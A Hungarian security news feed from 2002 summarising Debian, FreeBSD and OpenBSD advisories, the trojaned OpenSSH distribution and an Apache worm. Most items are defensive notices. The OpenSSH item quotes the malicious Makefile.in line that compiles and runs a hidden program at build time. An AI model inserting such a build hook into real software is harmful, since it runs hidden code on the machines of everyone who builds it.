Bug

DSA 140-2 Az új libpng csomagok javítanak egy lehetséges puffertúlcsordulást

 ( gyu | 2002. augusztus 5., hétfő - 12:10 )

Csomag: libpng, libpng3

Sebezhetőség: Puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



Kiegészítésként a DSA-140-1-es biztonsági hibajegyhez az alábbi csomagok javítást tartalmaznak egy lehetséges puffer-túlcsordulási hibára. A PNG könyvtár megvalósít egy biztonsági-ráhagyást, amit szintén betettek az "upstream" kiadásba. Köszönet illeti Glenn Randers-Pehrson-t, aki informálta a Debian Security Team-et.

DSA 141-1 mpack puffer túlcsordulás

 ( szogi | 2002. augusztus 2., péntek - 12:28 )

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...

Niels Provos: OpenSSH Security Advisory: Trojaned Distribution Files

 ( trey | 2002. augusztus 1., csütörtök - 17:45 )

Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

  • OpenSSH version 3.2.2p1
  • OpenSSH version 3.4p1
  • OpenSSH version 3.4

A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

Kapcsolódó cikkek:
OpenSSH hiba ismét!
OpenSSH trójai!

DSA 140-1 Az új libpng csomagok javítják a puffertúlcsordulást

 ( gyu | 2002. augusztus 1., csütörtök - 16:28 )

Csomag: libpng2, libpng3

Támadhatóság: puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.

DSA 139-1 Az új super csomagok javítják a helyi root exploitot

 ( gyu | 2002. augusztus 1., csütörtök - 15:54 )

Csomag: super

Támadhatóság: format string vulnerability

Probléma típus: helyi

Debian-specifikus: nem



A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.

OpenSSH trójai!

 ( bra | 2002. augusztus 1., csütörtök - 11:23 )

A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

míg az eredeti fájlé:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.

OpenSSH hiba ismét!

 ( Anonymous | 2002. augusztus 1., csütörtök - 11:14 )

Ismét bebizonyosodott, hogy semmi sem tökeletes. Még a "javított" OpenSSH sem... Egy igen érdekes levelet lehet olvasni a freebsd-security@ levlistán. A levél írója szerint a 3.4-es OpenSSH BACKDOOR-os! Mindenki nézzen utána a kérdesnek, gyakorlatilag megint nem vagyunk biztonságban.

Olvasd el a levelet itt.

FreeBSD Security Advisory FreeBSD-SA-02:34.rpc

 ( trey | 2002. augusztus 1., csütörtök - 10:12 )

Topic: Sun RPC XDR dekóder 'buffer overflow' hibát tartalmaz
Kategória: core
Modul: libc
Bejelentve: 2002-07-31
Közreműködők: ISS X-Force
Érintett rendszerek: Az összes FreeBSD kiadás, beleértve a 4.6.1-RELEASE-p3 -at is
Javítva:


2002-07-31 14:45:29 UTC (RELENG_4)
2002-07-31 14:47:02 UTC (RELENG_4_6)
2002-07-31 14:49:18 UTC (RELENG_4_5)
2002-07-31 14:50:18 UTC (RELENG_4_4)


FreeBSD specifikus: nem

A bejelentés:

DSA-138-1: gallery - remote exploit

 ( trey | 2002. augusztus 1., csütörtök - 8:37 )

Csomag: gallery
Támadhatóság: remote exploit
Probléma-típus: távoli
Debian-specifikus: nem

Problémát találtak a gallery (web alapú fotó album) eszközben. A probléma a GALLERY_BASEDIR változóval van. A hibát kihasználva lehetőség nyílhat arra, hogy a webszerveren parancsokat hajtson végre a rosszindulatú támadó a webszervert futtató felhasználó nevében (uid).

A hiba javítva van az 1.2.5-7 verziójú Debian csomagban.

Az eredeti hibajelentés: DSA-138-1
Frissétésről szóló FAQ

FreeBSD Security Advisory: FreeBSD-SA-02:32.pppd

 ( trey | 2002. július 31., szerda - 17:30 )

Sebastian Krahmer [krahmer@suse.de] egy kihasználható 'race condition' típusú hibát talált a FreeBSD pppd implementációjában. A hiba FreeBSd összes kiadását érinti, beleértve a 4.6.1-RELEASE-p1-t is. A hiba javítva van az alábbi kiadásokban:

2002-07-30 03:50:40 UTC (RELENG_4)
2002-07-30 19:15:52 UTC (RELENG_4_6)
2002-07-30 19:16:46 UTC (RELENG_4_5)
2002-07-30 19:17:27 UTC (RELENG_4_4)

A hiba nem FreeBSD specifikus. A javítás, workaround, patch és egyébb információkért olvasd el a bejelentést:

DSA-137-1: Az új mm csomagok javítják a nembiztonságos temp-fájl létrehozást

 ( gyu | 2002. július 30., kedd - 20:02 )

Csomag: mm

Támadhatóság: Nembiztonságos ideiglenes fájlok

Probléma-típus: helyi

Debian-specifikus: nem

CVE Id: CAN-2002-0658



Marcus Meissner és Sebastian Krahmer fedezte fel és javította egy tempfájl-támadhatóságot az mm nevû osztott memóriakönyvtárban. Ez a probléma kihasználható root-jogosultságok szerzésére egy olyan gépen, ami apache-ot futtat, és az apache ehhez az osztott könyvtárhoz van linkelve. Feltéve ha egy user hozzáfér egy eleve adott "www-data" shellhez (amit könnyen lehet szerezni pl. a PHP-n keresztül.)

DSA-136-1 Többszörös OpenSSL problémák

 ( gyu | 2002. július 30., kedd - 15:51 )

Csomag : openssl

Probléma típus: több távolról kihasználható hiba

Debian-specifikus: nem

CVE: CAN-2002-0655 CAN-2002-0656 CAN-2002-0657 CAN-2002-0659



Az OpenSSL fejlesztõi team bejelentette, hogy A.L Digital LTD.-tõl és a DARPA CHATS programjához tartozó "The Bunker" által végzett security audit több távolról kihasználható puffer-túlcsordulási hibát talált az OpenSSL kódjában. Továbbá az OpenSSL ASN1 értelmezõje lehetséges, hogy DoS-ra érzékeny, amely hibát egymástól függetlenül talált meg Adi Stav és James Yonan.

Újabb PHP bug

 ( trey | 2002. július 22., hétfő - 21:27 )

Újabb súlyos hibát találtak a PHP-ban. A bugot az e-matters Security csapat találta. A hiba azért súlyos mert távolról kihasználható, és egyes architektúrák gépeit akár teljesen kompromittálni lehet a bug kihasználásával. A hiba a PHP 4.2.0 és 4.2.1 verzióit érinti. A hiba lehet DoS (Denial of Service) típusú, de akár teljesen lehet vele kompromittálni a webszervert. Az e-matters nem adja ki az exploitot. Ennek ellenére mindenkinek aki PHP-t használ azt ajánlják, hogy azonnal frissítse a PHP-t a webszerverén a 4.2.2 verzióra. Ebben a verzióban már javították a hibát.

FreeBSD Advisory: tcpdump (FreeBSD-SA-02:29), ktrace (FreeBSD-SA-02:30)

 ( trey | 2002. július 13., szombat - 8:14 )

A FreeBSD biztonsági csapat két figyelmeztetést adott ki, az egyik a tcpdump-pal (FreeBSD-SA-02:29), a másk pedig a ktrace-szel (FreeBSD-SA-02:30) kapcsolatos.

Linux Kernel Privileged File Descriptor Resource Exhaustion Vulnerability

 ( trey | 2002. július 12., péntek - 20:17 )

Egy újabb hiba a mostani Linux kernelekben. A Linux Kernel Privileged File Descriptor Resource Exhaustion Vulnerability (megpróbálom lefordítani ;) : Linux Kernel privilegizált file leíró erőforrás kiürítési sebezhetőség - wtf?) hibát nem régiben fedezték fel néhány újabb Linux kernelben.

A hiba bejelentésében az alábbiakat olvashatjuk:

Potenciális lokális 'root' exploit a KDE-ben

 ( trey | 2002. július 8., hétfő - 20:18 )

Egy lehetséges lokális 'root' exploit van a KDE 2.2 verziójától kezdve a KDE 3.0.2 verzióig bezárólag az 'artswrapper' nevű alkalmazásban (amely a KDE 2 pre-releasekben mutatkozott be).

A BitchX 1.0c19 IRC klines backdoor-os

 ( trey | 2002. július 2., kedd - 21:25 )

A népszerű konzolos IRC kliens, a BitchX 1.0c19-es verziója hátsó bejáratot tartalmaz. A BugTraq szerint a BitchX ftp szerveréről letöltött forráskód (ftp.bitchx.com) érdekes kódot tartalmaz. A BitchX fejlesztőjét már értesítették, remélhetőleg a javítás hamarosan kész lesz.

DSA-135-1: libapache-mod-ssl - puffer túlcsordulás / DoS

 ( trey | 2002. július 2., kedd - 15:56 )

Csomag: libapache-mod-ssl

Probléma típus: puffer túlcsordulás / DoS

Debian-specifikus: nem

A libapache-mod-ssl csomag lehetővé teszi, hogy SSL funkciókat használjunk ki apache webszerverben. Újabban hibát találtak a .htaccess fileok kezelésében, amely lehetővé teszi nem kívánatos kód futtatását a szerveren a web szervert futtató felhasználó nevében, alkalom nyílvat DoS támadásra (killezve az apache gyerek processzét), és lehetővé teszi, hogy a támadó átvegye az irányítást az apache gyerek (child) processz felett. A hibáról bővebb leírást itt találsz.

A hiba javítva van a libapache-mod-ssl_2.4.10-1.3.9-1potato2 csomagban (potato), és a libapache-mod-ssl_2.8.9-2 csomagban (woody). Azonnali frissítést javaslunk.

Az eredeti hibajelentés: DSA-133-5


Frissétésről szóló FAQ

Bugok: Apache féreg pontosabb leírása, binárisa, forráskódja

 ( trey | 2002. június 29., szombat - 10:34 )

Domas Mituzas (az előző cikkben említett programozó) egy levélben részletes leírást adott a féregről. Az általuk felállított csapda-rendszer fogta meg a férget. Egy élesben működő Apache 1.3.24-es szervert használtak a "befogáshoz". A további vizsgálatok céljából közzé tette a .a és .uua binárisokat, és az apache-worm.c forráskódot.

Bővebb információ a folytatásban:

Bugok: Figyelem itt az új Apache féreg

 ( trey | 2002. június 29., szombat - 10:04 )

A ZDNet egyik cikke a "Watch out for new Apache worm" címet kapta.

A féregnek még nincs neve - csak FreeBSD rendszereken él meg - saját flood hálózatot épít - más (nem FreeBSD) rendszereket is DoS-olhat - várható a megjelenése Linux/Solaris/Unix rendszerekre is

A cikk szerint a biztonsági szakértők azon dolgoznak, hogy dekódolják az a férget, amely a kb. 2 hete ismert Apache hibát használja ki. A féreg egyelőre csak a FreeBSD alapon futó, biztonsági patchel nem rendelkező Apache szervereken képes terjedni. Bár voltak emberek akik az jelentették, hogy a féreg képes megfertőzni a más rendszern futó Apache szervereket világszerte.

"Ez terjed" - mondta Domas Mituzas, aki rendszer fejlesztő a Microlink Systems-nél, amely egy balti információ-technológiai cég. "Lengyelországból ért el minket, de a megjegyzések olaszul vannak, tehát jöhetett a világ bármely pontjáról."

FreeBSD: puffer túlcsordulás a DNS resolverben

 ( trey | 2002. június 27., csütörtök - 6:50 )

A tegnapi OpenBSD resolver hiba után a FreeBSD team is bejelentette a saját DNS resolveréban levő puffer túlcsorulási hibát.

Bővebb információt a FreeBSD-SA-02:28.resolv Security Advisory-ban találsz.

OpenBSD: Potenciális puffer túlcsordulás a DNS resolverben

 ( trey | 2002. június 26., szerda - 18:11 )

Ez a hét nem az OpenBSD csapat hete az biztos. Egy potenciális puffer túlcsordulási hibát találtak az OpenBSD DNS (Domain Name Service) resolverében. A hiba az összes architektúrát érinti:

025: SECURITY FIX: June 25, 2002

A potential buffer overflow in the DNS resolver has been found.

A source code patch exists which remedies the problem

OpenSSH expolit - upgrade javasolt 3.3 -ra

 ( Anonymous | 2002. június 25., kedd - 6:46 )



Package : ssh

Problem type : remote exploit

Debian-specific: no

udv

Miki

DSA-133-1: apache-perl

 ( trey | 2002. június 21., péntek - 21:20 )

Csomag: apache-perl

Probléma típus: távoli DoS / exploit

Debian specifikus: nem

Mark Litchfield talált a napokban egy DoS sebezhetőséget az Apache webszerverben. A hibát kihasználva az áldozat gépe ellen távoli DoS (denial of service) támadást lehet intézni. A hibát kihasználva lehetőség nyílhat arra, hogy a szerveren nem kívánatos kódot futtasson a támadó.

A debian stabil verziójában az 1.3.9-14.1-1.21.20000309-1 verziójú csomag javítja a hibát. Azonnali frissítést javaslunk!

Az eredeti hibajelentés: DSA-133-1

Frissétésről szóló FAQ

DSA-131 apache - remote DoS / expl. + DSA-132 apache-ssl - remote DoS / expl.

 ( trey | 2002. június 19., szerda - 20:00 )

A Debian Project ma bejelentette az Apache/Apache-SSL a napok óta ismert bugot.

Mark Litchfield talált a napokban egy DoS sebezhetőséget az Apache webszerverben. A hibát kihasználva az áldozat gépe ellen távoli DoS (denial of service) támadást lehet intézni. A hibát kihasználva lehetőség nyílhat arra, hogy 64bites Unix rendszereken nem kívánatos kódot futtasson a támadó.

A hiba javítva van a 1.3.9-14.1 verziójú Debian csomagban. Azonnali fissítés javasolt.

Az eredeti hibajelentések: dsa-131, dsa-132
Frissítésről szóló FAQ